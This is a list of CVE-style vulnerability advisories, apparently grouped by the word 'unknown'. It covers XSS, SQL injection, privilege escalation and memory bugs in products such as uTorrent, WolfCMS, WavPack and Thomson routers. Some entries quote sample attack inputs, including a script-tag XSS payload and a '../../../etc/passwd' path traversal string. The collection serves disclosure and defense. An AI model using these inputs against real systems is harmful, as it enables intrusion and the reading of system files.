** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in WolfCMS up to 0.8.3.1. It has been rated as problematic. This issue affects some unknown processing of the file /wolfcms/?/admin/user/add of the component User Add. The manipulation of the argument name leads to basic cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-135125 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
A vulnerability, which was classified as problematic, has been found in Axios Italia Axios RE 1.7.0/7.0.0. This issue affects some unknown processing of the component Error Message Handler. The manipulation leads to information disclosure (ASP.NET). The attack may be initiated remotely.
A vulnerability classified as critical was found in Axios Italia Axios RE 1.7.0/7.0.0. This vulnerability affects unknown code of the file REDefault.aspx of the component Connection Handler. The manipulation of the argument DBIDX leads to privilege escalation. The attack can be initiated remotely.
A vulnerability, which was classified as critical, was found in Podman and Varlink 1.5.1. This affects an unknown part of the component API. The manipulation leads to Remote Privilege Escalation. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-143949 was assigned to this vulnerability.
A vulnerability has been found in ajenti 2.1.31 and classified as critical. This vulnerability affects unknown code of the component API. The manipulation leads to privilege escalation. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 2.1.32 is able to address this issue. The name of the patch is 7aa146b724e0e20cfee2c71ca78fafbf53a8767c. It is recommended to upgrade the affected component.
A vulnerability was found in OpenNetAdmin 18.1.1. It has been rated as critical. Affected by this issue is some unknown functionality. The manipulation leads to privilege escalation. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in CoreHR Core Portal up to 27.0.7. It has been classified as problematic. Affected is an unknown function. The manipulation leads to cross site request forgery. It is possible to launch the attack remotely. Upgrading to version 27.0.8 is able to address this issue. It is recommended to upgrade the affected component.
A vulnerability was found in Sricam IP CCTV Camera. It has been classified as critical. Affected is an unknown function of the component Device Viewer. The manipulation leads to memory corruption. Local access is required to approach this attack.
A vulnerability was found in Sricam IP CCTV Camera and classified as critical. This issue affects some unknown processing of the component Device Viewer. The manipulation leads to memory corruption. An attack has to be approached locally. The exploit has been disclosed to the public and may be used.
While Skipping unknown IES, EMM is reading the buffer even if the no of bytes to read are more than message length which may cause device to shutdown in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables in APQ8053, APQ8096AU, APQ8098, MDM9150, MDM9205, MDM9206, MDM9640, MDM9650, MDM9655, MSM8905, MSM8909, MSM8909W, MSM8917, MSM8920, MSM8937, MSM8940, MSM8953, MSM8976, MSM8996AU, MSM8998, Nicobar, QCM2150, QCS605, QM215, SC8180X, SDA660, SDA845, SDM429, SDM439, SDM450, SDM630, SDM632, SDM636, SDM660, SDM670, SDM710, SDM845, SDM850, SDX20, SDX24, SDX55, SM6150, SM7150, SM8150, SM8250, Snapdragon_High_Med_2016, SXR1130, SXR2130
Advantech WebAccess/HMI Designer 2.1.9.31 has Exception Handler Chain corruption starting at Unknown Symbol @ 0x0000000000000000 called from ntdll!RtlRaiseStatus+0x00000000000000b4.
The hncbd90 component in Hancom Office 9.6.1.9403 allows a use-after-free via an unknown object in a crafted .docx file.
In the TCP implementation (gnrc_tcp) in RIOT through 2019.07, the parser for TCP options does not terminate on all inputs, allowing a denial-of-service, because sys/net/gnrc/transport_layer/tcp/gnrc_tcp_option.c has an infinite loop for an unknown zero-length option.
JetBrains PyCharm before 2019.2 was allocating a buffer of unknown size for one of the connection processes. In a very specific situation, it could lead to a remote invocation of an OOM error message because of Uncontrolled Memory Allocation.
Using memory after being freed in qsee due to wrong implementation can lead to unexpected behavior such as execution of unknown code in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables in APQ8009, APQ8017, APQ8053, APQ8096AU, APQ8098, MDM9150, MDM9206, MDM9207C, MDM9607, MDM9640, MDM9650, MSM8905, MSM8909W, MSM8917, MSM8920, MSM8937, MSM8940, MSM8953, MSM8996AU, MSM8998, QCS605, QM215, SDA660, SDA845, SDM429, SDM429W, SDM439, SDM450, SDM630, SDM632, SDM636, SDM660, SDM845, SDX20, SDX24, SM8150, SXR1130
** DISPUTED ** An issue was discovered in wcd9335_codec_enable_dec in sound/soc/codecs/wcd9335.c in the Linux kernel through 5.1.5. It uses kstrndup instead of kmemdup_nul, which allows attackers to have an unspecified impact via unknown vectors. NOTE: The vendor disputes this issues as not being a vulnerability because switching to kmemdup_nul() would only fix a security issue if the source string wasn't NUL-terminated, which is not the case.
Kevin Backhouse discovered that apport would read a user-supplied configuration file with elevated privileges. By replacing the file with a symbolic link, a user could get apport to read any file on the system as root, with unknown consequences.
In Wireshark 3.0.0, the Rbm dissector could go into an infinite loop. This was addressed in epan/dissectors/file-rbm.c by handling unknown object types safely.
OpenEnergyMonitor Project Emoncms 9.8.8 is affected by: Cross Site Scripting (XSS). The impact is: Theoretically low, but might potentially enable persistent XSS (user could embed mal. code). The component is: Javascript code execution in "Name", "Location", "Bio" and "Starting Page" fields in the "My Account" page. File: Lib/listjs/list.js, line 67. The attack vector is: unknown, victim must open profile page if persistent was possible.
In package installer in Android-8.0, Android-8.1 and Android-9, there is a possible bypass of the unknown source warning due to a confused deputy scenario. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Android ID: A-112031362.
Prior to version 0.3.0, chloride's use of net-ssh resulted in host fingerprints for previously unknown hosts getting added to the user's known_hosts file without confirmation. In version 0.3.0 this is updated so that the user's known_hosts file is not updated by chloride.
The Quagga BGP daemon (bgpd) prior to version 1.2.3 can double-free memory when processing certain forms of UPDATE message, containing cluster-list and/or unknown attributes. A successful attack could cause a denial of service or potentially allow an attacker to execute arbitrary code.
In the Windows 10 April 2018 Update, Windows Defender SmartScreen honors the "SEE_MASK_FLAG_NO_UI" flag associated with downloaded files and will not show any UI. Files that are unknown and potentially dangerous will be allowed to run because SmartScreen will not prompt the user for a decision, and if the user is offline all files will be allowed to be opened because Windows won't prompt the user to ask what to do. Firefox incorrectly sets this flag when downloading files, leading to less secure behavior from SmartScreen. Note: this issue only affects Windows 10 users running the April 2018 update or later. It does not affect other Windows users or other operating systems. This vulnerability affects Thunderbird &lt; 52.8, Thunderbird ESR &lt; 52.8, Firefox &lt; 60, and Firefox ESR &lt; 52.8.
If Media Capture and Streams API permission is requested from documents with "data:" or "blob:" URLs, the permission notifications do not properly display the originating domain. The notification states "Unknown protocol" as the requestee, leading to user confusion about which site is asking for this permission. This vulnerability affects Firefox &lt; 59.
A vulnerability, which was classified as problematic, has been found in l2c2technologies Koha up to 20180108. This issue affects some unknown processing of the file /cgi-bin/koha/opac-MARCdetail.pl. The manipulation of the argument biblionumber with the input 2"&gt;&lt;TEST&gt; leads to cross site scripting. The attack may be initiated remotely. The identifier of the patch is 950fc8e101886821879066b33e389a47fb0a9782. It is recommended to upgrade the affected component. The identifier VDB-261677 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in Acumos Design Studio up to 2.0.7. Affected is an unknown function. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. Upgrading to version 2.0.8 is able to address this issue. The name of the patch is 0df8a5e8722188744973168648e4c74c69ce67fd. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-249420.
A vulnerability was found in MdAlAmin-aol Own Health Record 0.1-alpha/0.2-alpha/0.3-alpha/0.3.1-alpha. It has been rated as problematic. This issue affects some unknown processing of the file includes/logout.php. The manipulation leads to cross-site request forgery. The attack may be initiated remotely. Upgrading to version 0.4-alpha is able to address this issue. The patch is named 58b413aa40820b49070782c786c526850ab7748f. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-249191.
A vulnerability was found in &amp;#3619;&amp;#3632;&amp;#3610;&amp;#3610;&amp;#3610;&amp;#3633;&amp;#3597;&amp;#3594;&amp;#3637;&amp;#3629;&amp;#3629;&amp;#3609;&amp;#3652;&amp;#3621;&amp;#3609;&amp;#3660; Online Accounting System up to 1.4.0 and classified as problematic. This issue affects some unknown processing of the file ckeditor/filemanager/browser/default/image.php. The manipulation of the argument fid with the input ../../../etc/passwd leads to path traversal: '../filedir'. The exploit has been disclosed to the public and may be used. Upgrading to version 2.0.0 is able to address this issue. The identifier of the patch is 9d9618422b980335bb30be612ea90f4f56cb992c. It is recommended to upgrade the affected component. The identifier VDB-246641 was assigned to this vulnerability.
A vulnerability was found in Vaerys-Dawn DiscordSailv2 up to 2.10.2. It has been rated as critical. Affected by this issue is some unknown functionality of the component Tag Handler. The manipulation leads to improper access controls. Upgrading to version 2.10.3 is able to address this issue. The name of the patch is cc12e0be82a5d05d9f359ed8e56088f4f8b8eb69. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-244484.
A vulnerability was found in Vaerys-Dawn DiscordSailv2 up to 2.10.2. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the component Command Mention Handler. The manipulation leads to improper access controls. Upgrading to version 2.10.3 is able to address this issue. The patch is named cc12e0be82a5d05d9f359ed8e56088f4f8b8eb69. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-244483.
A vulnerability was found in glb Meetup Tag Extension 0.1 on MediaWiki. It has been rated as problematic. This issue affects some unknown processing of the component Link Attribute Handler. The manipulation leads to use of web link to untrusted target with window.opener access. Upgrading to version 0.2 is able to address this issue. The identifier of the patch is 850c726d6bbfe0bf270801fbb92a30babea4155c. It is recommended to upgrade the affected component. The identifier VDB-238157 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in Ping Identity Self-Service Account Manager 1.1.2. Affected by this issue is some unknown functionality of the file src/main/java/com/unboundid/webapp/ssam/SSAMController.java. The manipulation leads to cross site scripting. The attack may be launched remotely. Upgrading to version 1.1.3 is able to address this issue. The patch is identified as f64b10d63bb19ca2228b0c2d561a1a6e5a3bf251. It is recommended to upgrade the affected component. VDB-225362 is the identifier assigned to this vulnerability.
A vulnerability was found in Segmentio is-url up to 1.2.2. It has been rated as problematic. Affected by this issue is some unknown functionality of the file index.js. The manipulation leads to inefficient regular expression complexity. The attack may be launched remotely. Upgrading to version 1.2.3 is able to address this issue. The patch is identified as 149550935c63a98c11f27f694a7c4a9479e53794. It is recommended to upgrade the affected component. VDB-220058 is the identifier assigned to this vulnerability.
A vulnerability was found in melnaron mel-spintax. It has been rated as problematic. Affected by this issue is some unknown functionality of the file lib/spintax.js. The manipulation of the argument text leads to inefficient regular expression complexity. The name of the patch is 37767617846e27b87b63004e30216e8f919637d3. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-218456.
A vulnerability was found in Prestaul skeemas and classified as problematic. This issue affects some unknown processing of the file validators/base.js. The manipulation of the argument uri leads to inefficient regular expression complexity. The patch is named 65e94eda62dc8dc148ab3e59aa2ccc086ac448fd. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-218003.
A vulnerability classified as critical has been found in lojban jbovlaste. This affects an unknown part of the file dict/listing.html. The manipulation leads to sql injection. It is possible to initiate the attack remotely. The patch is named 6ff44c2e87b1113eb07d76ea62e1f64193b04d15. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-217647.
A vulnerability classified as critical has been found in Netis Netcore Router. This affects an unknown part. The manipulation leads to use of hard-coded password. It is possible to initiate the attack remotely. The identifier VDB-217593 was assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in JoomGallery up to 3.3.3. This affects an unknown part of the file administrator/components/com_joomgallery/views/config/tmpl/default.php of the component Image Sort Handler. The manipulation leads to sql injection. Upgrading to version 3.3.4 is able to address this issue. The identifier of the patch is dc414ee954e849082260f8613e15a1c1e1d354a1. It is recommended to upgrade the affected component. The identifier VDB-217569 was assigned to this vulnerability.
A vulnerability was found in PeterMu nodebatis up to 2.1.x. It has been classified as critical. Affected is an unknown function. The manipulation leads to sql injection. Upgrading to version 2.2.0 is able to address this issue. The patch is identified as 6629ff5b7e3d62ad8319007a54589ec1f62c7c35. It is recommended to upgrade the affected component. VDB-217554 is the identifier assigned to this vulnerability.
A vulnerability was found in Wikimedia mediawiki-extensions-I18nTags and classified as problematic. This issue affects some unknown processing of the file I18nTags_body.php of the component Unlike Parser. The manipulation leads to cross site scripting. The attack may be initiated remotely. The identifier of the patch is b4bc3cbbb099eab50cf2b544cf577116f1867b94. It is recommended to apply a patch to fix this issue. The identifier VDB-217445 was assigned to this vulnerability.
A vulnerability was found in OSM Lab show-me-the-way. It has been rated as problematic. This issue affects some unknown processing of the file js/site.js. The manipulation leads to cross site scripting. The attack may be initiated remotely. The patch is named 4bed3b34dcc01fe6661f39c0e5d2285b340f7cac. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-217439.
A vulnerability classified as problematic was found in Zenoss Dashboard up to 1.3.4. Affected by this vulnerability is an unknown functionality of the file ZenPacks/zenoss/Dashboard/browser/resources/js/defaultportlets.js. The manipulation of the argument HTMLString leads to cross site scripting. The attack can be launched remotely. Upgrading to version 1.3.5 is able to address this issue. The identifier of the patch is f462285a0a2d7e1a9255b0820240b94a43b00a44. It is recommended to upgrade the affected component. The identifier VDB-217153 was assigned to this vulnerability.
A vulnerability was found in rgb2hex up to 0.1.5. It has been rated as problematic. This issue affects some unknown processing. The manipulation leads to inefficient regular expression complexity. The attack may be initiated remotely. Upgrading to version 0.1.6 is able to address this issue. The patch is named 9e0c38594432edfa64136fdf7bb651835e17c34f. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-217151.
A vulnerability was found in Macaron csrf and classified as problematic. Affected by this issue is some unknown functionality of the file csrf.go. The manipulation of the argument Generate leads to sensitive cookie without secure attribute. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The patch is identified as dadd1711a617000b70e5e408a76531b73187031c. It is recommended to apply a patch to fix this issue. VDB-217058 is the identifier assigned to this vulnerability.
A vulnerability classified as problematic has been found in Twitter-Post-Fetcher up to 17.x. This affects an unknown part of the file js/twitterFetcher.js of the component Link Target Handler. The manipulation leads to use of web link to untrusted target with window.opener access. It is possible to initiate the attack remotely. Upgrading to version 18.0.0 is able to address this issue. The name of the patch is 7d281c6fb5acbc29a2cad295262c1f0c19ca56f3. It is recommended to upgrade the affected component. The identifier VDB-217017 was assigned to this vulnerability.
A vulnerability was found in simple_php_link_shortener. It has been classified as critical. Affected is an unknown function of the file index.php. The manipulation of the argument $link["id"] leads to sql injection. The name of the patch is b26ac6480761635ed94ccb0222ba6b732de6e53f. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-216996.
A vulnerability was found in FarCry Solr Pro Plugin up to 1.5.x. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file packages/forms/solrProSearch.cfc of the component Search Handler. The manipulation of the argument suggestion leads to cross site scripting. The attack can be launched remotely. Upgrading to version 1.6.0 is able to address this issue. The name of the patch is b8f3d61511c9b02b781ec442bfb803cbff8e08d5. It is recommended to upgrade the affected component. The identifier VDB-216961 was assigned to this vulnerability.
A vulnerability was found in shred cilla. It has been classified as problematic. Affected is an unknown function of the file cilla-xample/src/main/webapp/WEB-INF/jsp/view/search.jsp of the component Search Handler. The manipulation of the argument details leads to cross site scripting. It is possible to launch the attack remotely. The name of the patch is d345e6bc7798bd717a583ec7f545ca387819d5c7. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-216960.
A vulnerability was found in moappi Json2html up to 1.1.x and classified as problematic. This issue affects some unknown processing of the file json2html.js. The manipulation leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 1.2.0 is able to address this issue. The name of the patch is 2d3d24d971b19a8ed1fb823596300b9835d55801. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-216959.
A vulnerability, which was classified as problematic, was found in JmPotato Pomash. This affects an unknown part of the file Pomash/theme/clean/templates/editor.html. The manipulation of the argument article.title/content.title/article.tag leads to cross site scripting. It is possible to initiate the attack remotely. The name of the patch is be1914ef0a6808e00f51618b2de92496a3604415. It is recommended to apply a patch to fix this issue. The identifier VDB-216957 was assigned to this vulnerability.
A vulnerability was found in email-existence. It has been rated as problematic. Affected by this issue is some unknown functionality of the file index.js. The manipulation leads to inefficient regular expression complexity. The name of the patch is 0029ba71b6ad0d8ec0baa2ecc6256d038bdd9b56. It is recommended to apply a patch to fix this issue. VDB-216854 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in uTorrent. This issue affects some unknown processing of the component Guest Account. The manipulation leads to privilege escalation. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. It is recommended to upgrade the affected component.
A vulnerability classified as critical was found in uTorrent. This vulnerability affects unknown code of the component PRNG. The manipulation leads to weak authentication. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. It is recommended to upgrade the affected component.
A vulnerability classified as critical has been found in uTorrent. This affects an unknown part. The manipulation leads to memory corruption. It is possible to initiate the attack remotely. It is recommended to upgrade the affected component.
A vulnerability was found in uTorrent. It has been rated as critical. Affected by this issue is some unknown functionality of the component JSON RPC Server. The manipulation leads to privilege escalation. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. It is recommended to upgrade the affected component.
A vulnerability was found in uTorrent Web. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the component HTTP RPC Server. The manipulation leads to privilege escalation. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. It is recommended to upgrade the affected component.
A vulnerability was found in Thomson TCW710 ST5D.10.05. It has been declared as problematic. This vulnerability affects unknown code of the file /goform/RgUrlBlock.asp. The manipulation of the argument BasicParentalNewKeyword with the input &gt;&lt;script&gt;alert(1)&lt;/script&gt; as part of POST Request leads to cross site scripting (Persistent). The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in Thomson TCW710 ST5D.10.05. It has been classified as problematic. This affects an unknown part of the file /goform/RgDhcp. The manipulation of the argument PppUserName with the input &gt;&lt;script&gt;alert(1)&lt;/script&gt; as part of POST Request leads to cross site scripting (Persistent). It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in Thomson TCW710 ST5D.10.05 and classified as problematic. Affected by this issue is some unknown functionality of the file /goform/RgDdns. The manipulation of the argument DdnsHostName with the input &gt;&lt;script&gt;alert(1)&lt;/script&gt; as part of POST Request leads to cross site scripting (Persistent). The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability has been found in Thomson TCW710 ST5D.10.05 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /goform/RgTime. The manipulation of the argument TimeServer1/TimeServer2/TimeServer3 with the input &gt;&lt;script&gt;alert(1)&lt;/script&gt; as part of POST Request leads to cross site scripting (Persistent). The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as problematic, was found in Thomson TCW710 ST5D.10.05. Affected is an unknown function of the file /goform/RGFirewallEL. The manipulation of the argument EmailAddress/SmtpServerName with the input &gt;&lt;script&gt;alert(1)&lt;/script&gt; as part of POST Request leads to cross site scripting (Persistent). It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as problematic, has been found in Thomson TCW710 ST5D.10.05. This issue affects some unknown processing of the file /goform/wlanPrimaryNetwork. The manipulation of the argument ServiceSetIdentifier with the input &gt;&lt;script&gt;alert(1)&lt;/script&gt; as part of POST Request leads to basic cross site scripting (Persistent). The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-126695.
Terminology before 1.3.1 allows Remote Code Execution because popmedia is mishandled, as demonstrated by an unsafe "cat README.md" command when \e}pn is used. A popmedia control sequence can allow the malicious execution of executable file formats registered in the X desktop share MIME types (/usr/share/applications). The control sequence defers unknown file types to the handle_unknown_media() function, which executes xdg-open against the filename specified in the sequence. The use of xdg-open for all unknown file types allows executable file formats with a registered shared MIME type to be executed. An attacker can achieve remote code execution by introducing an executable file and a plain text file containing the control sequence through a fake software project (e.g., in Git or a tarball). When the control sequence is rendered (such as with cat), the executable file will be run.
In The Sleuth Kit (TSK) through 4.6.4, hfs_cat_traverse in tsk/fs/hfs.c does not properly determine when a key length is too large, which allows attackers to cause a denial of service (SEGV on unknown address with READ memory access in a tsk_getu16 call in hfs_dir_open_meta_cb in tsk/fs/hfs_dent.c).
An issue was discovered in the Texas Instruments (TI) TM4C, MSP432E and MSP432P microcontroller series. The eXecute-Only-Memory (XOM) implementation prevents code read-outs on protected memory by generating bus faults. However, single-stepping and using breakpoints is allowed in XOM-protected flash memory. As a consequence, it is possible to execute single instructions with arbitrary system states (e.g., registers, status flags, and SRAM content) and observe the state changes produced by the unknown instruction. An attacker could exploit this vulnerability by executing protected and unknown instructions with specific system states and observing the state changes. Based on the gathered information, it is possible to reverse-engineer the executed instructions. The processor acts as a kind of "instruction oracle."
An issue was discovered in GitLab Community and Enterprise Edition before 11.1.7, 11.2.x before 11.2.4, and 11.3.x before 11.3.1. Attackers may have been able to obtain sensitive access-token data from Sentry logs via the GRPC::Unknown exception.
IBM DataPower Gateway 7.1.0.0 through 7.1.0.19, 7.2.0.0 through 7.2.0.16, 7.5.0.0 through 7.5.0.10, 7.5.1.0 through 7.5.1.9, 7.5.2.0 through 7.5.2.9, and 7.6.0.0 through 7.6.0.2 and IBM MQ Appliance 8.0.0.0 through 8.0.0.8 and 9.0.1 through 9.0.5 could allow a local user to cause a denial of service through unknown vectors. IBM X-Force ID: 144724.
** DISPUTED ** An issue has been found in PNGwriter 0.7.0. It is a SEGV in pngwriter::readfromfile in pngwriter.cc. NOTE: there is a "Warning: PNGwriter was never designed for reading untrusted files with it. Do NOT use this in sensitive environments, especially DO NOT read PNGs from unknown sources with it!" statement in the master/README.md file.
A NULL pointer dereference (aka SEGV on unknown address 0x000000000000) was discovered in work_stuff_copy_to_from in cplus-dem.c in GNU libiberty, as distributed in GNU Binutils 2.30. This can occur during execution of objdump.
A Improper Input Validation vulnerability in Open Build Service allows remote attackers to extract files from the system where the service runs. Affected releases are openSUSE Open Build Service: status of is unknown.
Pivotal Concourse after 2018-03-05 might allow remote attackers to have an unspecified impact, if a customer obtained the Concourse software from a DNS domain that is no longer controlled by Pivotal. The original domain for the Concourse CI (concourse-dot-ci) open source project has been registered by an unknown actor, and is therefore no longer the official website for Concourse CI. The new official domain is concourse-ci.org. At approximately 4 am EDT on March 7, 2018 the Concourse OSS team began receiving reports that the Concourse domain was not responding. The Concourse OSS team discovered, upon investigation with both the original and the new domain registrars, that the originating domain registrar had made the domain available for purchase. This was done despite the domain being renewed by the Concourse OSS team through August 2018. For a customer to be affected, they would have needed to access a download from a "concourse-dot-ci" domain web site after March 6, 2018 18:00:00 EST. Accessing that domain is NOT recommended by Pivotal. Anyone who had been using that domain should immediately begin using the concourse-ci.org domain instead. Customers can also safely access Concourse software from the traditionally available locations on the Pivotal Network or GitHub.
Undefined behavior in UE while processing unknown IEI in OTA message in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables in MDM9150, MDM9206, MDM9607, MDM9640, MDM9650, MDM9655, MSM8909W, MSM8996AU, QCS605, SD 210/SD 212/SD 205, SD 425, SD 427, SD 430, SD 435, SD 439 / SD 429, SD 450, SD 625, SD 632, SD 636, SD 650/52, SD 675, SD 712 / SD 710 / SD 670, SD 820, SD 820A, SD 835, SD 845 / SD 850, SD 855, SDA660, SDM439, SDM630, SDM660, SDX20, SM7150, Snapdragon_High_Med_2016, SXR1130
An issue was discovered in WavPack 5.1.0 and earlier for W64 input. Out-of-bounds writes can occur because ParseWave64HeaderConfig in wave64.c does not validate the sizes of unknown chunks before attempting memory allocation, related to a lack of integer-overflow protection within a bytes_to_copy calculation and subsequent malloc call, leading to insufficient memory allocation.
An issue was discovered in WavPack 5.1.0 and earlier for DSDiff input. Out-of-bounds writes can occur because ParseDsdiffHeaderConfig in dsdiff.c does not validate the sizes of unknown chunks before attempting memory allocation, related to a lack of integer-overflow protection within a bytes_to_copy calculation and subsequent malloc call, leading to insufficient memory allocation.
An issue was discovered in WavPack 5.1.0 and earlier for WAV input. Out-of-bounds writes can occur because ParseRiffHeaderConfig in riff.c does not validate the sizes of unknown chunks before attempting memory allocation, related to a lack of integer-overflow protection within a bytes_to_copy calculation and subsequent malloc call, leading to insufficient memory allocation.
libarchive version commit 416694915449219d505531b1096384f3237dd6cc onwards (release v3.1.0 onwards) contains a CWE-416: Use After Free vulnerability in RAR decoder - libarchive/archive_read_support_format_rar.c that can result in Crash/DoS - it is unknown if RCE is possible. This attack appear to be exploitable via the victim must open a specially crafted RAR archive.
FreeRDP FreeRDP 2.0.0-rc3 released version before commit 205c612820dac644d665b5bb1cdf437dc5ca01e3 contains a Other/Unknown vulnerability in channels/drdynvc/client/drdynvc_main.c, drdynvc_process_capability_request that can result in The RDP server can read the client's memory.. This attack appear to be exploitable via RDPClient must connect the rdp server with echo option. This vulnerability appears to have been fixed in after commit 205c612820dac644d665b5bb1cdf437dc5ca01e3.
Copay Bitcoin Wallet version 5.01 to 5.1.0 included. contains a Other/Unknown vulnerability in wallet private key storage that can result in Users' private key can be compromised. . This attack appear to be exploitable via Affected version run the malicious code at startup . This vulnerability appears to have been fixed in 5.2.0 and later .
Alpine Linux version Versions prior to 2.6.10, 2.7.6, and 2.10.1 contains a Other/Unknown vulnerability in apk-tools (Alpine Linux' package manager) that can result in Remote Code Execution. This attack appear to be exploitable via A specially crafted APK-file can cause apk to write arbitrary data to an attacker-specified file, due to bugs in handling long link target name and the way a regular file is extracted.. This vulnerability appears to have been fixed in 2.6.10, 2.7.6, and 2.10.1.
ZoneMinder version &lt;= 1.32.2 contains a Other/Unknown vulnerability in User-controlled parameter that can result in Disclosure of confidential data, denial of service, SSRF, remote code execution.
ZoneMinder version &lt;= 1.32.2 contains a Other/Unknown vulnerability in User-controlled parameter that can result in Disclosure of confidential data, denial of service, SSRF, remote code execution.
Ubilling version &lt;= 0.9.2 contains a Other/Unknown vulnerability in user-controlled parameter that can result in Disclosure of confidential data, denial of service, SSRF, remote code execution.
MegaMek version &lt; v0.45.1 contains a Other/Unknown vulnerability in Object Stream Connection that can result in Disclosure of confidential data, denial of service, SSRF, remote code execution.
Brave Software Inc. Brave version version 0.22.810 to 0.24.0 contains a Other/Unknown vulnerability in function ContentSettingsObserver::AllowScript() in content_settings_observer.cc that can result in Websites can run inline JavaScript even if script is blocked, making attackers easier to track users. This attack appear to be exploitable via the victim must visit a specially crafted website. This vulnerability appears to have been fixed in 0.25.2.
aio-libs aiohttp-session version 2.6.0 and earlier contains a Other/Unknown vulnerability in EncryptedCookieStorage and NaClCookieStorage that can result in Non-expiring sessions / Infinite lifespan. This attack appear to be exploitable via Recreation of a cookie post-expiry with the same value.
OCaml compiler allows attackers to have unspecified impact via unknown vectors, a similar issue to CVE-2017-9772 "but with much less impact."
Buffer overflow in the "megasas_mmio_write" function in Qemu 2.9.0 allows remote attackers to have unspecified impact via unknown vectors.
The cp2112_gpio_direction_input function in drivers/hid/hid-cp2112.c in the Linux kernel 4.9.x before 4.9.9 does not have the expected EIO error status for a zero-length report, which allows local users to have an unspecified impact via unknown vectors.
Unspecified vulnerability in ASSA ABLOY APTUS Styra Porttelefonkort 4400 before A2 has unknown impact and attack vectors.
Directory traversal vulnerability in Zimbra Collaboration Suite (aka ZCS) before 8.7.6 allows attackers to have unspecified impact via unknown vectors.
An issue was discovered in AppArmor before 2.12. Incorrect handling of unknown AppArmor profiles in AppArmor init scripts, upstart jobs, and/or systemd unit files allows an attacker to possibly have increased attack surfaces of processes that were intended to be confined by AppArmor. This is due to the common logic to handle 'restart' operations removing AppArmor profiles that aren't found in the typical filesystem locations, such as /etc/apparmor.d/. Userspace projects that manage their own AppArmor profiles in atypical directories, such as what's done by LXD and Docker, are affected by this flaw in the AppArmor init script logic.
Palo Alto Networks Terminal Services (aka TS) Agent 6.0, 7.0, and 8.0 before 8.0.1 uses weak permissions for unspecified resources, which allows attackers to obtain sensitive session information via unknown vectors.
An issue was discovered in sysPass 2.x before 2.1, in which an algorithm was never sufficiently reviewed by cryptographers. The fact that inc/SP/Core/Crypt.class is using the MCRYPT_RIJNDAEL_256() function (the 256-bit block version of Rijndael, not AES) instead of MCRYPT_RIJNDAEL_128 (real AES) could help an attacker to create unknown havoc in the remote system.
Previous versions of Apache Flex BlazeDS (4.7.2 and earlier) did not restrict which types were allowed for AMF(X) object deserialization by default. During the deserialization process code is executed that for several known types has undesired side-effects. Other, unknown types may also exhibit such behaviors. One vector in the Java standard library exists that allows an attacker to trigger possibly further exploitable Java deserialization of untrusted data. Other known vectors in third party libraries can be used to trigger remote code execution.
The kbase_dispatch function in arm/t7xx/r5p0/mali_kbase_core_linux.c in the GPU driver on Samsung devices with M(6.0) and N(7.0) software and Exynos AP chipsets allows attackers to have unspecified impact via unknown vectors, which trigger an out-of-bounds read, aka SVE-2016-6362.
An issue was discovered in Pivotal Spring Security 4.2.0.RELEASE through 4.2.2.RELEASE, and Spring Security 5.0.0.M1. When configured to enable default typing, Jackson contained a deserialization vulnerability that could lead to arbitrary code execution. Jackson fixed this vulnerability by blacklisting known "deserialization gadgets." Spring Security configures Jackson with global default typing enabled, which means that (through the previous exploit) arbitrary code could be executed if all of the following is true: (1) Spring Security's Jackson support is being leveraged by invoking SecurityJackson2Modules.getModules(ClassLoader) or SecurityJackson2Modules.enableDefaultTyping(ObjectMapper); (2) Jackson is used to deserialize data that is not trusted (Spring Security does not perform deserialization using Jackson, so this is an explicit choice of the user); and (3) there is an unknown (Jackson is not blacklisting it already) "deserialization gadget" that allows code execution present on the classpath. Jackson provides a blacklisting approach to protecting against this type of attack, but Spring Security should be proactive against blocking unknown "deserialization gadgets" when Spring Security enables default typing.
